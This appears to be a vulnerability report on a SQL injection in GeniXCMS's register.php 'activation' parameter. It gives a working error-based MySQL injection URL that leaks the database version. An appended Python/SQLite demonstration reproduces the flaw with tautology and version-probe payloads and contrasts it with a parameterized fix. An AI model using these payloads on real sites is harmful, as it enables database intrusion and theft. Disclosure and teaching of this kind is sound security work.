In /register.php:

```php
if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));
}
```
The activation param leads to an SQL injection vulnerability.

POC:

http://127.0.0.1/GeniXCMS/register.php?activation=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)%23

We'll find the database version in the response page, which proves the vulnerability exists.

By the way, if you can help me apply for a CVE-ID, I will be very grateful. XD
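Added example, not code from the issue or from GeniXCMS: a runnable model of the `sprintf('%s')` pattern above beside its parameterized replacement. It uses SQLite in memory with a constructed two-row `user` table (the e-mail addresses and activation tokens are made up), so the MySQL-only error-based payload from the POC cannot run here; instead it uses a tautology payload and a version-inference payload, which break out of the string literal the same way, to show that the concatenated query returns a row for a token that does not exist and that the parameterized query does not.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the CMS `user` table.
    # The tokens and addresses below are hypothetical, not from the project.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, activation TEXT)"
    )
    conn.executemany(
        "INSERT INTO user (email, activation) VALUES (?, ?)",
        [("alice@example.com", "7f3a9c"), ("bob@example.com", "b1d0e4")],
    )
    return conn


def lookup_vulnerable(conn, activation):
    # Mirrors register.php: the request value is pasted into the SQL text,
    # so a single quote in it terminates the literal and the rest is parsed
    # as SQL. This is the bug, reproduced on purpose.
    sql = "SELECT * FROM user WHERE activation = '%s' LIMIT 1" % activation
    return conn.execute(sql).fetchone()


def lookup_fixed(conn, activation):
    # Parameterized query: the value travels separately from the SQL text,
    # so quotes inside it are data, never syntax. In PHP this is a PDO or
    # mysqli prepared statement.
    sql = "SELECT * FROM user WHERE activation = ? LIMIT 1"
    return conn.execute(sql, (activation,)).fetchone()


def demo():
    conn = make_db()
    # Tautology: closes the literal, ORs in a true condition, and lets the
    # original trailing quote close the new literal.
    tautology = "x' OR '1'='1"
    # Inference: the row comes back only if the DB version starts with "3.",
    # the SQLite analogue of reading version() out of the POC's error text.
    version_probe = "x' OR sqlite_version() LIKE '3.%"
    return {
        "vuln_tautology": lookup_vulnerable(conn, tautology),
        "vuln_version_probe": lookup_vulnerable(conn, version_probe),
        "fixed_tautology": lookup_fixed(conn, tautology),
        "fixed_version_probe": lookup_fixed(conn, version_probe),
        "fixed_legit": lookup_fixed(conn, "b1d0e4"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name}: {row}")
```

`lookup_vulnerable` hands back the first user for both payloads even though no such token exists, which is the same class of result the POC demonstrates against MySQL; `lookup_fixed` returns nothing for either payload and still finds the real token.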